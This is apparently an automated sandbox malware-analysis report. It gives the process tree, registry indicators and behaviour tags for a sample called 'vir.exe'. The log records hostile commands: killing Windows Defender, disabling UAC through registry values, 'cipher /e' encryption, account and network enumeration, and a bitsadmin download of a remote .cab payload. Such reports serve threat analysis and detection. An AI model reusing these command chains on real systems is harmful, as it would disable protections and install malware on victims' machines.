PID 2340 wrote to memory of 2984	2340	cmd.exe	39
PID 1664 wrote to memory of 840	1664	cmd.exe	40
PID 1664 wrote to memory of 840	1664	cmd.exe	40
PID 1664 wrote to memory of 840	1664	cmd.exe	40
PID 1664 wrote to memory of 840	1664	cmd.exe	40
PID 2984 wrote to memory of 1220	2984	net.exe	41
PID 2984 wrote to memory of 1220	2984	net.exe	41
PID 2984 wrote to memory of 1220	2984	net.exe	41
PID 2984 wrote to memory of 1220	2984	net.exe	41
PID 1664 wrote to memory of 1852	1664	cmd.exe	42
PID 1664 wrote to memory of 1852	1664	cmd.exe	42
PID 1664 wrote to memory of 1852	1664	cmd.exe	42
PID 1664 wrote to memory of 1852	1664	cmd.exe	42
PID 2340 wrote to memory of 2344	2340	cmd.exe	43
PID 2340 wrote to memory of 2344	2340	cmd.exe	43
PID 2340 wrote to memory of 2344	2340	cmd.exe	43
PID 2340 wrote to memory of 2344	2340	cmd.exe	43
PID 2344 wrote to memory of 2408	2344	net.exe	44
PID 2344 wrote to memory of 2408	2344	net.exe	44
PID 2344 wrote to memory of 2408	2344	net.exe	44
PID 2344 wrote to memory of 2408	2344	net.exe	44
PID 2340 wrote to memory of 2228	2340	cmd.exe	46
PID 2340 wrote to memory of 2228	2340	cmd.exe	46
PID 2340 wrote to memory of 2228	2340	cmd.exe	46
PID 2340 wrote to memory of 2228	2340	cmd.exe	46
PID 1668 wrote to memory of 2512	1668	cmd.exe	48
PID 1668 wrote to memory of 2512	1668	cmd.exe	48
PID 1668 wrote to memory of 2512	1668	cmd.exe	48
PID 1668 wrote to memory of 2512	1668	cmd.exe	48
PID 1668 wrote to memory of 3004	1668	cmd.exe	50
PID 1668 wrote to memory of 3004	1668	cmd.exe	50
PID 1668 wrote to memory of 3004	1668	cmd.exe	50
PID 1668 wrote to memory of 3004	1668	cmd.exe	50
PID 2668 wrote to memory of 2744	2668	iexplore.exe	53
PID 2668 wrote to memory of 2744	2668	iexplore.exe	53
PID 2668 wrote to memory of 2744	2668	iexplore.exe	53
PID 2668 wrote to memory of 2744	2668	iexplore.exe	53

System policy modification 1 TTPs 2 IoCs

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "1"	Rover.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Rover.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\vir.exe
"C:\Users\Admin\AppData\Local\Temp\vir.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\!main.cmd" "
  2⤵
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Suspicious use of WriteProcessMemory
  PID:1668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K spread.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1664
  - - C:\Windows\SysWOW64\xcopy.exe
      xcopy 1 C:\Users\Admin\Desktop
      4⤵
      Enumerates system info in registry
      PID:2824
  - - C:\Windows\SysWOW64\xcopy.exe
      xcopy 2 C:\Users\Admin\Desktop
      4⤵
      Enumerates system info in registry
      PID:840
  - - C:\Windows\SysWOW64\xcopy.exe
      xcopy 3 C:\Users\Admin\
      4⤵
      Enumerates system info in registry
      PID:1852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K doxx.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig
      4⤵
      Gathers network information
      PID:1416
  - - C:\Windows\SysWOW64\net.exe
      net accounts
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2984
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts
        5⤵
        
        PID:1220
  - - C:\Windows\SysWOW64\net.exe
      net user
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2344
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user
        5⤵
        
        PID:2408
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /apps /v /fo table
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2228
- - C:\Windows\SysWOW64\PING.EXE
    ping google.com -t -n 1 -s 4 -4
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1624
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im WindowsDefender.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K handler.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K cipher.cmd
    3⤵
    PID:2952
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e
      4⤵
      PID:840
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e
      4⤵
      PID:3656
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e
      4⤵
      PID:2904
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e
      4⤵
      PID:3500
- - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\Rover.exe
    Rover.exe
    3⤵
    - Modifies WinLogon for persistence
    - UAC bypass
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - System policy modification
    PID:2000
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\web.htm
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:2096
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2096 CREDAT:275457 /prefetch:2
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:332
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2096 CREDAT:406532 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2844
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2096 CREDAT:734222 /prefetch:2
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:3296
- - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\Google.exe
    Google.exe
    3⤵
    - Executes dropped EXE
    PID:1188
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\helper.vbs"
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\PING.EXE
    ping google.com -t -n 1 -s 4 -4
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2720
- - C:\Windows\SysWOW64\PING.EXE
    ping mrbeast.codes -t -n 1 -s 4 -4
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3808
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy Google.exe C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:3344
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy Rover.exe C:\Users\Admin\Desktop
    3⤵
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    PID:1660
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy spinner.gif C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K bloatware.cmd
    3⤵
    - Loads dropped DLL
    PID:2324
  - - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\bloatware\1.exe
      1.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2300
  - - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\bloatware\3.exe
      3.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies registry class
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:2432
    - - C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
        
        C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
        5⤵
        Executes dropped EXE
        Unexpected DNS network traffic destination
        Modifies system certificate store
        
        PID:3516
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=GB&client_asn=60068&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiR0IiLCJjbGllbnRfdmVyc2lvbiI6IjE3OSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyNS0wMy0xOVQxNToxMDo1MC44NDVaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ
        5⤵
        
        PID:840
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\bloatware\2.hta"
      4⤵
      Blocklisted process makes network request
      PID:3976
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /transfer dwnl-task-25373 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\dwnl_beetle-cab.cab" | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_start.txt" & echo %errorlevel% > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_exitcode.txt"
        5⤵
        
        PID:3656
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer dwnl-task-25373 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\dwnl_beetle-cab.cab"
        6⤵
        Download via BitsAdmin
        
        PID:1676
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:936
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2376
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell Get-MpComputerStatus > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_defenderVersionPowershell.txt"
        5⤵
        
        PID:2748
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-MpComputerStatus
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2204
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1104
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3520
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2948
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2888
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1960
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2924
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2944
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2332
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1428
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:408
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1732
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2512
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2260
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2404
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3164
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3520
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2892
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2916
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2024
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:972
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2716
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3840
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2152
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2216
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2436
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1736
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3332
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1864
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2828
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2112
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3192
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2260
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3308
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2820
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2916
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2716
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2704
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:992
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3424
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:4004
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3760
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3468
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:236
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3504
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3432
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2216
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1732
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2748
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1684
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1864
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:408
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2588
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:532
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3804
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2756
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1620
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2464
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2716
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2152
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3464
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3028
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:4004
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2116
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3352
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3332
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3504
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:1736
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1004
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3192
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2748
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2888
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1580
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3940
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3532
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2820
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:4000
